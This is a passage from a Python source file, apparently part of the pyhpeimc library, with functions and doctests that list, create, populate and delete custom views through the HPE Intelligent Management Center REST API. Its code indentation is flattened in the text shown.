>>> non_existant_view = get_custom_views(auth.creds, auth.url, name = '''Doesn't Exist''')
>>> assert non_existant_view == None
"""
if name is None:
get_custom_view_url = '/imcrs/plat/res/view/custom?resPrivilegeFilter=false&desc=false&total=false'
elif name is not None:
get_custom_view_url = '/imcrs/plat/res/view/custom?resPrivilegeFilter=false&name='+name+'&desc=false&total=false'
f_url = url + get_custom_view_url
r = requests.get(f_url, auth=auth, headers=headers)
try:
if r.status_code == 200:
custom_view_list = (json.loads(r.text))
if 'customView' in custom_view_list:
custom_view_list = custom_view_list['customView']
if type(custom_view_list) == dict:
custom_view_list = [custom_view_list]
return custom_view_list
else:
return custom_view_list
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
def get_custom_view_details(name, auth, url):
"""
function requires no input and returns a list of dictionaries of custom views from an HPE IMC. Optional name
argument will return only the specified view.
:param name: str containing the name of the desired custom view
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:param name: (optional) str of name of specific custom view
:return: list of dictionaties containing attributes of the custom views
:rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> view_details = get_custom_view_details('My Network View', auth.creds, auth.url)
>>> assert type(view_details) is list
>>> assert 'label' in view_details[0]
"""
view_id = get_custom_views(auth, url, name=name)[0]['symbolId']
get_custom_view_details_url = '/imcrs/plat/res/view/custom/' + str(view_id)
f_url = url + get_custom_view_details_url
r = requests.get(f_url, auth=auth,
headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 200:
current_devices = (json.loads(r.text))
if 'device' in current_devices:
return current_devices['device']
else:
return []
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
def create_custom_views(auth, url,name=None, upperview=None):
"""
function takes no input and issues a RESTFUL call to get a list of custom views from HPE IMC. Optional Name input
will return only the specified view.
:param name: string containg the name of the desired custom view
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: str of creation results ( "view " + name + "created successfully"
:rtype: str
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
#Create L1 custom view
>>> create_custom_views(auth.creds, auth.url, name='L1 View')
'View L1 View created successfully'
>>> view_1 =get_custom_views( auth.creds, auth.url, name = 'L1 View')
>>> assert type(view_1) is list
>>> assert view_1[0]['name'] == 'L1 View'
#Create Nested custome view
>>> create_custom_views(auth.creds, auth.url, name='L2 View', upperview='L1 View')
'View L2 View created successfully'
>>> view_2 = get_custom_views( auth.creds, auth.url, name = 'L2 View')
>>> assert type(view_2) is list
>>> assert view_2[0]['name'] == 'L2 View'
"""
create_custom_views_url = '/imcrs/plat/res/view/custom?resPrivilegeFilter=false&desc=false&total=false'
f_url = url + create_custom_views_url
if upperview is None:
payload = '''{ "name": "''' + name + '''",
"upLevelSymbolId" : ""}'''
#print (payload)
else:
parentviewid = get_custom_views(auth, url, upperview)[0]['symbolId']
payload = '''{ "name": "'''+name+ '''",
"upLevelSymbolId" : "'''+str(parentviewid)+'''"}'''
#print (payload)
r = requests.post(f_url, data = payload, auth=auth, headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 201:
return 'View ' + name +' created successfully'
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
#TODO Need to add tests and examples for add_devs_custom_views
def add_devs_custom_views(custom_view_name, dev_list, auth, url):
"""
function takes a list of devIDs from devices discovered in the HPE IMC platform and and issues a RESTFUL call to
add the list of devices to a specific custom views from HPE IMC.
:param dev_list: list containing the devID of all devices to be contained in this custom view.
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: str of creation results ( "view " + name + "created successfully"
:rtype: str
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
"""
view_id = get_custom_views(auth, url, name=custom_view_name)[0]['symbolId']
add_devs_custom_views_url = '/imcrs/plat/res/view/custom/'+str(view_id)
payload = '''{"device" : '''+ json.dumps(dev_list) + '''}'''
f_url = url + add_devs_custom_views_url
r = requests.put(f_url, data = payload, auth=auth, headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 204:
print ('View ' + custom_view_name +' : Devices Successfully Added')
return r.status_code
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
def delete_custom_view(auth, url, name):
"""
function takes input of auth, url, and name and issues a RESTFUL call to delete a specific of custom views from HPE
IMC.
:param name: string containg the name of the desired custom view
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: str of creation results ( "view " + name + "created successfully"
:rtype: str
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> delete_custom_view(auth.creds, auth.url, name = "L1 View")
'View L1 View deleted successfully'
>>> view_1 =get_custom_views( auth.creds, auth.url, name = 'L1 View')
>>> assert view_1 == None
>>> delete_custom_view(auth.creds, auth.url, name = "L2 View")
'View L2 View deleted successfully'
>>> view_2 =get_custom_views( auth.creds, auth.url, name = 'L2 View')
>>> assert view_2 == None
"""
view_id = get_custom_views(auth, url,name )[0]['symbolId']
delete_custom_view_url = '/imcrs/plat/res/view/custom/'+str(view_id)
f_url = url + delete_custom_view_url
r = requests.delete(f_url, auth=auth, headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 204:
return 'View ' + name +' deleted successfully'
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' delete_custom_view: An Error has occured' | HPNetworking/HP-Intelligent-Management-Center | build/lib/pyhpeimc/plat/groups.py | Python | apache-2.0 | 9,544 |
Subsets and Splits
Unique Repositories with URLs
Lists unique repository names along with their GitHub URLs, providing basic identification information for each repository.